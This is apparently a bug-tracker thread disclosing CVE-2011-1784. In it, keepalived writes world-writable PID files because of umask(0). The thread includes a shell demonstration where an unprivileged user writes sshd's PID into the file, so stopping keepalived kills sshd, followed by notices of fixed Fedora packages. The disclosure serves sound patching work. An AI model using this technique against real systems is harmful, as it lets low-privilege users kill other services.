It was reported [1] that keepalived wrote its PID files in /var/run as world-writable files. This could allow an unprivileged user to change the referenced PID in the PID file, and upon a service restart or stop of keepalived, would kill the other process. The keepalived daemonize code explicitly sets umask(0) which is the root cause of this flaw, so PID file creation should probably contain an explicit permissions settings. For instance, as root: # service keepalived status keepalived (pid 9634) is running... # cat /var/run/keepalived.pid 9634 # ls -al /var/run/keepalived.pid -rw-rw-rw- 1 root root 5 May 10 15:13 /var/run/keepalived.pid Then as an unprivileged user: % echo $(ps ax|grep sshd|grep -v grep|cut -d ' ' -f 2) >/var/run/keepalived.pid % cat /var/run/keepalived.pid 1638 Back to root: # service keepalived status keepalived (pid 1638) is running... # service keepalived stop Stopping keepalived: [ OK ] # service sshd status openssh-daemon is stopped # ps ax|grep sshd|grep -v grep # ps ax|grep keepalived|grep -v grep 9634 ? Ss 0:00 /usr/sbin/keepalived -D 9636 ? S 0:00 /usr/sbin/keepalived -D 9637 ? S 0:00 /usr/sbin/keepalived -D [1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=626281
Created keepalived tracking bugs for this issue Affects: fedora-all [bug 704040] Affects: epel-6 [bug 704041]
This was assigned CVE-2011-1784.
keepalived-1.2.3-2.fc16 has been pushed to the Fedora 16 stable repository. If problems still persist, please make note of it in this bug report.
keepalived-1.2.5-2.fc17 has been pushed to the Fedora 17 stable repository. If problems still persist, please make note of it in this bug report.